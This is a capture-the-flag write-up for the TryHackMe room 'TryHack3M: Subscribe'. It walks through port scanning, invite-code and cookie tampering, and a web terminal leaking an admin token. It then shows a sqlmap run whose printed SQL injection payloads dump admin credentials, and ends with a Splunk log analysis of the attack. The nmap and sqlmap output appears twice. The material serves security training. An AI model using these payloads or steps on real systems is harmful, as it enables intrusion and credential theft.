TryHack3M: Subscribe

974fbf5503162b701c2e9e6dc3b51e0c.png

Target IP: 10.10.219.164
Challenge Description:
bf8eeede4889d756af866b2d56c5f4bd.png


Offense: Exploitation

ea68a2e8e96af42b60dc2ba74a52dafb.png
Performing a port scan using the command sudo nmap -sS 10.10.219.164 -p- returns the result shown above. There are six TCP ports open on the target machine. I will need to perform an aggressive port scan against these ports to identify more information.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sudo nmap -sV -A 10.10.219.164 -p 22,80,8000,8089,8191,40009
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-26 18:03 UTC
Nmap scan report for 10.10.219.164
Host is up (0.023s latency).

PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5f:1c:57:45:b9:9d:c8:69:e9:47:94:21:a3:fd:eb:70 (RSA)
|   256 a2:2e:5b:e0:e1:41:54:ef:9f:a7:99:17:2b:3d:e2:0e (ECDSA)
|_  256 c6:d2:62:0a:51:70:8d:98:9c:12:e0:95:32:55:87:25 (ED25519)
80/tcp    open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack3M | Cyber Security Training
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
8000/tcp  open  http            Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.219.164:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp  open  ssl/http        Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2024-04-05T11:00:59
|_Not valid after:  2027-04-05T11:00:59
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
8191/tcp  open  limnerpressure?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
40009/tcp open  http            Apache httpd 2.4.41
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.41 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.94%I=7%D=4/26%Time=662BEC7E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   21.98 ms 10.14.0.1
2   22.19 ms 10.10.219.164

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.04 seconds
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sudo nmap -sV -A 10.10.219.164 -p 22,80,8000,8089,8191,40009
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-26 18:03 UTC
Nmap scan report for 10.10.219.164
Host is up (0.023s latency).

PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5f:1c:57:45:b9:9d:c8:69:e9:47:94:21:a3:fd:eb:70 (RSA)
|   256 a2:2e:5b:e0:e1:41:54:ef:9f:a7:99:17:2b:3d:e2:0e (ECDSA)
|_  256 c6:d2:62:0a:51:70:8d:98:9c:12:e0:95:32:55:87:25 (ED25519)
80/tcp    open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack3M | Cyber Security Training
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
8000/tcp  open  http            Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.219.164:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp  open  ssl/http        Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2024-04-05T11:00:59
|_Not valid after:  2027-04-05T11:00:59
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
8191/tcp  open  limnerpressure?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
40009/tcp open  http            Apache httpd 2.4.41
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.41 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.94%I=7%D=4/26%Time=662BEC7E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   21.98 ms 10.14.0.1
2   22.19 ms 10.10.219.164

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.04 seconds

I performed an aggressive port scan using the command sudo nmap -sV -A 10.10.219.164 -p 22,80,8000,8089,8191,40009 against the six TCP ports and got the result shown above. There is an SSH application on port 22, and the rest are HTTP with different applications. I will start enumeration with the HTTP applications on the higher ports -- begining with port 80.


Enumeration

Port 80: HTTP
9b543b3472ef3e69e200cdefd8f68cf5.png
The webpage above is displayed to me when I visit the web application from my browser. Right away, I notice there are Login and Join NOW options. Maybe I can register as a user? I notice the Login feature displays the login page. However, the register page is interesting.

dd98da521a8b9872db927b93847f6008.png
The sign up page is shown above. It mentions I cannot register an account unless I have an invite code. Maybe the source-code of this webpage contains useful information? Time to find out.

e8dfff9ccb462a2071ad7e0020f74fc9.png
Scanning through the source-code of the sign-up page, I identified an interesting file with the name invite.js, as shown above. Maybe this file contains some information?

7073ec59f41d8c76fdf07433c075c210.png
The source-code of the invite.js is shown above.

function e() {
    var e = window.location.hostname;
    if (e === "capture3millionsubscribers.thm") {
        var o = new XMLHttpRequest;
        o.open("POST", "inviteCode1337HM.php", true);
        o.onload = function() {
            if (this.status == 200) {
                console.log("Invite Code:", this.responseText)
            } else {
                console.error("Error fetching invite code.")
            }
        };
        o.send()
    } else if (e === "hackme.thm") {
        console.log("This function does not operate on hackme.thm")
    } else {
        console.log("Lol!! Are you smart enought to get the invite code?")
    }
}
function e() {
    var e = window.location.hostname;
    if (e === "capture3millionsubscribers.thm") {
        var o = new XMLHttpRequest;
        o.open("POST", "inviteCode1337HM.php", true);
        o.onload = function() {
            if (this.status == 200) {
                console.log("Invite Code:", this.responseText)
            } else {
                console.error("Error fetching invite code.")
            }
        };
        o.send()
    } else if (e === "hackme.thm") {
        console.log("This function does not operate on hackme.thm")
    } else {
        console.log("Lol!! Are you smart enought to get the invite code?")
    }
}

The formatted source-code of invite.js is shown above. The code is easy to understand. If the hostname is capture3millionsubscribers.thm then a new HTTP request is made to inviteCode1337HM.php and the invite code is printed to the console. Time to put this to test. To achieve this, I will need to insert the hostname capture3millionsubscribers.thm inside my /etc/hosts file and then execute the function e to obtain the code.

6117e1e3d26951961710ce594e00e5f5.png
I inserted the hostname inside my /etc/hosts file first. Then I browsed to the web application again.

2ff033d4380772513ead2c1274dcb542.png
I browsed to http://capture3millionsubscribers.thm/sign_up.php and executed the function e by calling it via the web console. After executing it, I obtained the invite code VkXgo:Invited30MnUsers, as shown above. Maybe I can register as a user now.

f057bf51c9c4264428f15ec3b417427f.png
After entering the invite code, the webpage above is shown to me. I am provided the credentials guest@hackme.thm:wedidit1010. Now I can login as this new user.

a15cff0aa6a643f59ee14db8d0f8cb77.png
I logged in with the new set of credentials and the webpage above was presented to me. It looks like some sort of dashboard. There are two training rooms, as shown above. I viewed the source-code of the training rooms and the webpage but I did not find anything useful.

7bd3be2c303acc2935a26de7096fbe53.png
However, I intercepted a request to the dashboard.php and identified a parameter with the name isVIP. This is set in the cookie of the request. Maybe I can set it to true?

796ca5ac7211958501093548b8d59633.png
Then I changed the value of the parameter to true, as shown above.

9201d01a577cff6210cb1fa160033537.png
However, I did not find anything useful again in the new training room. I tried to start the machine, but I had no luck either as the message This page is only for VIP users was shown to me even after changing the isVIP parameter to true. When viewing the source-code of this training room, I noticed an unusual code shown above. I am guessing it is responsible for redirecting the request to another page. Maybe I can search for other .php files to identify where it redirects to? Time to test it.

d5cb502e7cf057d41e0abab0b82eae11.png
And bingo! I found another PHP page hidden in the source-code. To identify this, I searched for .php string in the source-code of the webpage. This name BBF813FA941496FCE961EBA46D754FF3.php is interesting.

7412f57ae1c1f644561e5f2be83e9f7f.png
Voila! Now I have access to the VIP training room, as shown above. This web application looks like a terminal. Maybe I can perform commands using it?

333489030b49960d6525f84be0e0f6b8.png
Using the web application, I executed the command whoami and obtained the result www-data as shown above.

9352493b63383187a04c362a593dca2a.png
I executed the command ls and noticed an intersting file with the name config.php. Then I executed the command cat config.php and obtained the result shown above. The secure token is ACC#SS_TO_ADM1N_P@NEL. The URL of the admin panel seems to be located at http://admin1337special.hackme.thm:40009 acccording to the configuration file shown above. I will need to insert this hostname admin1337special.hackme.thm inside my /etc/hosts file.

e94b78deaeca6e7db356468ca0286f69.png
I added the hostname inside my /etc/hosts file. Then I browsed to http://admin1337special.hackme.thm:40009, but the webpage above was shown to me. I do not have access to it. Time to perform a directory search to identify any pages I can access.

5c4f1a600705997729a3eea138c25025.png
I used the command gobuster dir -u http://admin1337special.hackme.thm:40009/public/html/ -w /usr/share/wordlists/dirb/big.txt -x html,php,txt to identify any hidden files & directories and got multiple hits shown above. The entry login.php seems interesting to me.

98e4d515c0085b1eed4488348813ea24.png
Browsing to http://admin1337special.hackme.thm:40009/public/html/login.php shows the webpage above. This seems to be the administration portal. Maybe I can access the portal by using the token ACC#SS_TO_ADM1N_P@NEL.

0b8815ec32054ca94cb2f8b62897fd1c.png
After using the login token, I am now informed to login. But I do not have the credentials. Hmmm. I tried default credentials such as admin:admin, but I had no luck. I tried to check the inputs for SQL injection, but I had no luck either. I intercepted the login attempt using burpsuite and saved this to a file called req on my machine.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sqlmap -r req --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:35:38 /2024-04-26/

[19:35:38] [INFO] parsing HTTP request from 'req'
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[19:35:40] [INFO] testing connection to the target URL
[19:35:40] [INFO] testing if the target URL content is stable
[19:35:41] [INFO] target URL content is stable
[19:35:41] [INFO] testing if (custom) POST parameter 'JSON username' is dynamic
[19:35:41] [WARNING] (custom) POST parameter 'JSON username' does not appear to be dynamic
[19:35:41] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON username' might be injectable (possible DBMS: 'MySQL')
[19:35:41] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON username' might be vulnerable to cross-site scripting (XSS) attacks
[19:35:41] [INFO] testing for SQL injection on (custom) POST parameter 'JSON username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 1
[19:35:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:35:46] [WARNING] reflective value(s) found and filtering out
[19:35:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:35:47] [INFO] testing 'Generic inline queries'
[19:35:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:35:47] [INFO] (custom) POST parameter 'JSON username' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[19:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:35:47] [WARNING] time-based comparison requires larger statistical model, please wait.......... (done)                                                                           
[19:35:57] [INFO] (custom) POST parameter 'JSON username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:35:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:35:57] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:35:57] [INFO] target URL appears to have 7 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:36:32] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[19:36:33] [INFO] target URL appears to be UNION injectable with 7 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:37:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:37:34] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
(custom) POST parameter 'JSON username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 168 HTTP(s) requests:
---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"username":"admin' AND EXTRACTVALUE(4821,CONCAT(0x5c,0x716a716a71,(SELECT (ELT(4821=4821,1))),0x7162707a71)) AND 'PXhx'='PXhx","password":"admin"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"admin' AND (SELECT 1155 FROM (SELECT(SLEEP(5)))OQhp) AND 'Hyaq'='Hyaq","password":"admin"}
---
[19:37:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
[19:37:42] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:37:42] [INFO] fetching current database
[19:37:42] [INFO] retrieved: 'hackme'
[19:37:42] [INFO] fetching tables for database: 'hackme'
[19:37:42] [INFO] retrieved: 'config'
[19:37:42] [INFO] retrieved: 'users'
[19:37:42] [INFO] fetching columns for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'id'
[19:37:42] [INFO] retrieved: 'int'
[19:37:42] [INFO] retrieved: 'title'
[19:37:42] [INFO] retrieved: 'varchar(255)'
[19:37:42] [INFO] retrieved: 'value'
[19:37:42] [INFO] retrieved: 'text'
[19:37:42] [INFO] fetching entries for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'invite'
[19:37:42] [INFO] retrieved: '1'
[19:37:42] [INFO] retrieved: 'signup'
Database: hackme
Table: config
[1 entry]
+----+--------+---------+
| id | title  | value   |
+----+--------+---------+
| 1  | signup | invite  |
+----+--------+---------+

[19:37:42] [INFO] table 'hackme.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/config.csv'
[19:37:42] [INFO] fetching columns for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'email'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'id'
[19:37:43] [INFO] retrieved: 'int'
[19:37:43] [INFO] retrieved: 'name'
[19:37:43] [INFO] retrieved: 'varchar(300)'
[19:37:43] [INFO] retrieved: 'password'
[19:37:43] [INFO] retrieved: 'varchar(255)'
[19:37:43] [INFO] retrieved: 'role'
[19:37:43] [INFO] retrieved: 'varchar(20)'
[19:37:43] [INFO] retrieved: 'status'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'username'
[19:37:43] [INFO] retrieved: 'varchar(50)'
[19:37:43] [INFO] fetching entries for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'admin@hackme.thm'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'Admin User'
[19:37:43] [INFO] retrieved: 'adminisadm1n'
[19:37:43] [INFO] retrieved: 'admin'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'admin'
Database: hackme
Table: users
[1 entry]
+----+------------+-------+------------------+--------+--------------+----------+
| id | name       | role  | email            | status | password     | username |
+----+------------+-------+------------------+--------+--------------+----------+
| 1  | Admin User | admin | admin@hackme.thm | 1      | adminisadm1n | admin    |
+----+------------+-------+------------------+--------+--------------+----------+

[19:37:43] [INFO] table 'hackme.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/users.csv'
[19:37:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm'
[19:37:43] [WARNING] your sqlmap version is outdated

[*] ending @ 19:37:43 /2024-04-26/
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/TryHack3M:Subscribe]
└─$ sqlmap -r req --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:35:38 /2024-04-26/

[19:35:38] [INFO] parsing HTTP request from 'req'
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[19:35:40] [INFO] testing connection to the target URL
[19:35:40] [INFO] testing if the target URL content is stable
[19:35:41] [INFO] target URL content is stable
[19:35:41] [INFO] testing if (custom) POST parameter 'JSON username' is dynamic
[19:35:41] [WARNING] (custom) POST parameter 'JSON username' does not appear to be dynamic
[19:35:41] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON username' might be injectable (possible DBMS: 'MySQL')
[19:35:41] [INFO] heuristic (XSS) test shows that (custom) POST parameter 'JSON username' might be vulnerable to cross-site scripting (XSS) attacks
[19:35:41] [INFO] testing for SQL injection on (custom) POST parameter 'JSON username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 1
[19:35:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:35:46] [WARNING] reflective value(s) found and filtering out
[19:35:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:35:47] [INFO] testing 'Generic inline queries'
[19:35:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:35:47] [INFO] (custom) POST parameter 'JSON username' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[19:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:35:47] [WARNING] time-based comparison requires larger statistical model, please wait.......... (done)                                                                           
[19:35:57] [INFO] (custom) POST parameter 'JSON username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:35:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:35:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:35:57] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:35:57] [INFO] target URL appears to have 7 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:36:32] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[19:36:33] [INFO] target URL appears to be UNION injectable with 7 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[19:37:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:37:34] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
(custom) POST parameter 'JSON username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 168 HTTP(s) requests:
---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"username":"admin' AND EXTRACTVALUE(4821,CONCAT(0x5c,0x716a716a71,(SELECT (ELT(4821=4821,1))),0x7162707a71)) AND 'PXhx'='PXhx","password":"admin"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"admin' AND (SELECT 1155 FROM (SELECT(SLEEP(5)))OQhp) AND 'Hyaq'='Hyaq","password":"admin"}
---
[19:37:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
[19:37:42] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:37:42] [INFO] fetching current database
[19:37:42] [INFO] retrieved: 'hackme'
[19:37:42] [INFO] fetching tables for database: 'hackme'
[19:37:42] [INFO] retrieved: 'config'
[19:37:42] [INFO] retrieved: 'users'
[19:37:42] [INFO] fetching columns for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'id'
[19:37:42] [INFO] retrieved: 'int'
[19:37:42] [INFO] retrieved: 'title'
[19:37:42] [INFO] retrieved: 'varchar(255)'
[19:37:42] [INFO] retrieved: 'value'
[19:37:42] [INFO] retrieved: 'text'
[19:37:42] [INFO] fetching entries for table 'config' in database 'hackme'
[19:37:42] [INFO] retrieved: 'invite'
[19:37:42] [INFO] retrieved: '1'
[19:37:42] [INFO] retrieved: 'signup'
Database: hackme
Table: config
[1 entry]
+----+--------+---------+
| id | title  | value   |
+----+--------+---------+
| 1  | signup | invite  |
+----+--------+---------+

[19:37:42] [INFO] table 'hackme.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/config.csv'
[19:37:42] [INFO] fetching columns for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'email'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'id'
[19:37:43] [INFO] retrieved: 'int'
[19:37:43] [INFO] retrieved: 'name'
[19:37:43] [INFO] retrieved: 'varchar(300)'
[19:37:43] [INFO] retrieved: 'password'
[19:37:43] [INFO] retrieved: 'varchar(255)'
[19:37:43] [INFO] retrieved: 'role'
[19:37:43] [INFO] retrieved: 'varchar(20)'
[19:37:43] [INFO] retrieved: 'status'
[19:37:43] [INFO] retrieved: 'varchar(100)'
[19:37:43] [INFO] retrieved: 'username'
[19:37:43] [INFO] retrieved: 'varchar(50)'
[19:37:43] [INFO] fetching entries for table 'users' in database 'hackme'
[19:37:43] [INFO] retrieved: 'admin@hackme.thm'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'Admin User'
[19:37:43] [INFO] retrieved: 'adminisadm1n'
[19:37:43] [INFO] retrieved: 'admin'
[19:37:43] [INFO] retrieved: '1'
[19:37:43] [INFO] retrieved: 'admin'
Database: hackme
Table: users
[1 entry]
+----+------------+-------+------------------+--------+--------------+----------+
| id | name       | role  | email            | status | password     | username |
+----+------------+-------+------------------+--------+--------------+----------+
| 1  | Admin User | admin | admin@hackme.thm | 1      | adminisadm1n | admin    |
+----+------------+-------+------------------+--------+--------------+----------+

[19:37:43] [INFO] table 'hackme.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm/dump/hackme/users.csv'
[19:37:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/admin1337special.hackme.thm'
[19:37:43] [WARNING] your sqlmap version is outdated

[*] ending @ 19:37:43 /2024-04-26/

After running sqlmap on the req request, I obtained the result above. I now have the password of the user admin. The new credentials set I have is admin:adminisadm1n, as shown above. Time to test it :)

c53b6404e73a8252a174a420ef551873.png
Now I have access to the administration portal, as shown above. I changed the registration method to Sign Up and pressed the Set Options. After doing this, I should be able to access the flag at http://hackme.thm.

3096f31e82b22c8a94951d5a137db05b.png
And bingo! The flag for this first part of the challenge is shown above. The first part of the challenge is complete. The second part is the defensive side now :)


Defense: Splunklab

12347d4fa5794a3055ba843c7dacf704.png
The total number of logs are 10530, as shown above. I used the command index=*.

ca409f56d145a79658c298dddd5c9a9a.png
The web hacking tool used by the attacker to attack the website is sqlmap, as shown above. The total events that were observed related to the attack is 158.

518f9f118a0b5024d0a56ec8f1cf9bc9.png
The observed IP address of the attacker is 83.45.212.17, as shown above. This can be identified by checking any event of the sqlmap.

c28aa6c9139ce3dc9a8ea78c7758d6f0.png
The total number of events that were observed from the attacker's IP is 184, as show above. To find this answer, I used the command index=* source_ip="83.45.212.17". To filter the attacks by the ip, I used the command index=* source_ip="83.45.212.17". In total there are 184 events.

482713987df6a357f0c5f87315f0de22.png
Previously, I identified the SQLmap logs. Checking through the logs, I noticed the interesting entry shown above. The table name the attacker used to attack is TryHack3M_Users, as shown above.